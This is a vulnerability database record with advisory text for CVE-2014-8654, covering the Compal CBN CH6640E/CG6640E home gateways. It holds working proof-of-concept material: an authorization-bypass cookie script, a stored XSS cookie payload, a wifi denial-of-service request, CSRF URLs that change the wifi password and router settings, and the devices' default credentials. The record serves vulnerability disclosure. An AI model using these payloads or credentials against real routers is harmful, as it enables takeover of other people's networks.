Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2014-5203 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
Authorization Bypass Information Disclosure Vulnerability
http://192.168.0.1/xml/CmgwWirelessSecurity.xml http://192.168.0.1/xml/DocsisConfigFile.xml http://192.168.0.1/xml/CmgwBasicSetup.xml http://192.168.0.1/basicDDNS.html http://192.168.0.1/basicLanUsers.html http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
Cookie: userData Value: hax0r">alert(document.cookie);
--
document.cookie="hax0r">alert(document.cookie);; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Cross-Site Request Forgery (CSRF) Vulnerability
DDNS config:
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0177",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "cg6640e wireless gateway",
"scope": "eq",
"trust": 1.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "",
"scope": "eq",
"trust": 1.6,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "ch664oe wireless gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "ch6640e wireless gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "networks",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "broadband networks inc cg6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks inc ch6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks ch6640-3.5.11.7-nosh",
"scope": null,
"trust": 0.3,
"vendor": "compal",
"version": null
},
{
"model": "broadband networks ch664oe wireless gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks cg6640e wireless gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "compal",
"version": "1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "model: ch6640 and ch6640e"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "hardware version: 1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "firmware version: ch6640-3.5.11.7-nosh"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "docsis mode: docsis 3.0"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "77760"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:cg6640e_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:ch664oe_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:compal_broadband_networks:firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "77760"
}
],
"trust": 0.3
},
"cve": "CVE-2014-8654",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2014-8654",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-07893",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-76599",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-8654",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-8654",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-189",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2014-5203",
"trust": 0.1,
"value": "(3/5)"
},
{
"author": "VULHUB",
"id": "VHN-76599",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76599"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site request forgery (CSRF) vulnerabilities in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway hardware 1.0 with firmware CH6640-3.5.11.7-NOSH allow remote attackers to hijack the authentication of administrators for requests that (1) have unspecified impact on DDNS configuration via a request to basicDDNS.html, (2) change the wifi password via the psKey parameter to setWirelessSecurity.html, (3) add a static MAC address via the MacAddress parameter in an add_static action to setBasicDHCP1.html, or (4) enable or disable UPnP via the UPnP parameter in an apply action to setAdvancedOptions.html. (2) setWirelessSecurity.html of psKey Via parameters wifi The password is changed. (3) setBasicDHCP1.html of add_static In action MacAddress Static via parameters MAC An address is added. (4) setAdvancedOptions.html of apply Of UPnP Via parameters UPnP Is enabled or disabled. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Ch664oe Wireless Gateway is prone to a cross-site request forgery vulnerability. The \u0027UPnP\u0027 parameter in the apply action of the html page exploits this vulnerability to enable or disable UPnP. \nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway. 
\n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information. \n\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\n\n\nVulnerabilities discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2014-5203\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\n\n\n04.10.2014\n\n---\n\n\n\nAuthorization Bypass Information Disclosure Vulnerability\n#########################################################\n\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\nhttp://192.168.0.1/basicDDNS.html\nhttp://192.168.0.1/basicLanUsers.html\nhttp://192.168.0.1:5000/rootDesc.xml\n\nSet cookie: userData to root or admin, reveals additional pages/info. \n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET 
http://192.168.0.1/basicDDNS.html?DdnsService=1\u0026DdnsUserName=a\u0026DdnsPassword=b\u0026DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0\u0026sMode=7\u0026sbMode=1\u0026encAlgm=3\u0026psKey=NEW_PASSWORD\u0026rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static\u0026MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF\u0026LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=2 HTTP/1.1 (disable)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8654"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "77760"
},
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76599"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/cbn_mv.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-76599",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76599"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8654",
"trust": 3.5
},
{
"db": "EXPLOIT-DB",
"id": "35075",
"trust": 2.9
},
{
"db": "BID",
"id": "70762",
"trust": 2.7
},
{
"db": "ZSL",
"id": "ZSL-2014-5203",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "128860",
"trust": 1.9
},
{
"db": "OSVDB",
"id": "113843",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "113842",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "113841",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "113840",
"trust": 1.8
},
{
"db": "XF",
"id": "98329",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-189",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6
},
{
"db": "BID",
"id": "77760",
"trust": 0.4
},
{
"db": "XF",
"id": "98328",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113838",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113836",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113837",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113839",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2014100162",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-76599",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76599"
},
{
"db": "BID",
"id": "77760"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"id": "VAR-201411-0177",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76599"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
}
]
},
"last_update_date": "2025-04-13T23:14:41.528000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76599"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php"
},
{
"trust": 2.1,
"url": "http://www.securityfocus.com/bid/70762"
},
{
"trust": 2.0,
"url": "http://www.exploit-db.com/exploits/35075"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113840"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113841"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113842"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113843"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98329"
},
{
"trust": 1.0,
"url": "http://xforce.iss.net/xforce/xfdb/98329"
},
{
"trust": 0.9,
"url": "http://www.exploit-db.com/exploits/35075/"
},
{
"trust": 0.9,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8654"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2014100162"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113836"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113837"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113838"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113839"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/128860"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98328"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basiclanusers.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/docsisconfigfile.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwbasicsetup.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setwirelesssecurity.html?ssid=0\u0026smode=7\u0026sbmode=1\u0026encalgm=3\u0026pskey=new_password\u0026rekeyint=0"
},
{
"trust": 0.1,
"url": "http://192.168.0.1:5000/rootdesc.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=1"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwwirelesssecurity.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/wirelesschannelstatus.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setbasicdhcp1.html?action=add_static\u0026macaddress=38%3a59%3af9%3ac3%3ae3%3aef\u0026leasedip=8"
},
{
"trust": 0.1,
"url": "http://www.icbn.com.tw"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html?ddnsservice=1\u0026ddnsusername=a\u0026ddnspassword=b\u0026ddnshostname=c#"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=2"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76599"
},
{
"db": "BID",
"id": "77760"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76599"
},
{
"db": "BID",
"id": "77760"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-25T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76599"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "77760"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"date": "2014-10-28T00:59:24",
"db": "PACKETSTORM",
"id": "128860"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"date": "2014-11-06T15:55:10.803000",
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-07T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2017-09-08T00:00:00",
"db": "VULHUB",
"id": "VHN-76599"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "77760"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005241"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-189"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-8654"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Cross-site request forgery vulnerability in hardware firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005241"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-189"
}
],
"trust": 0.6
}
}
VAR-201411-0176
Vulnerability from variot - Updated: 2025-04-13 23:14

Cross-site scripting (XSS) vulnerability in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to inject arbitrary web script or HTML via the userData cookie. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Firmware is prone to a cross-site scripting vulnerability.

Product web page: http://www.icbn.com.tw
Affected version:
Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more configuration information.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
Authorization Bypass Information Disclosure Vulnerability
http://192.168.0.1/xml/CmgwWirelessSecurity.xml http://192.168.0.1/xml/DocsisConfigFile.xml http://192.168.0.1/xml/CmgwBasicSetup.xml http://192.168.0.1/basicDDNS.html http://192.168.0.1/basicLanUsers.html http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
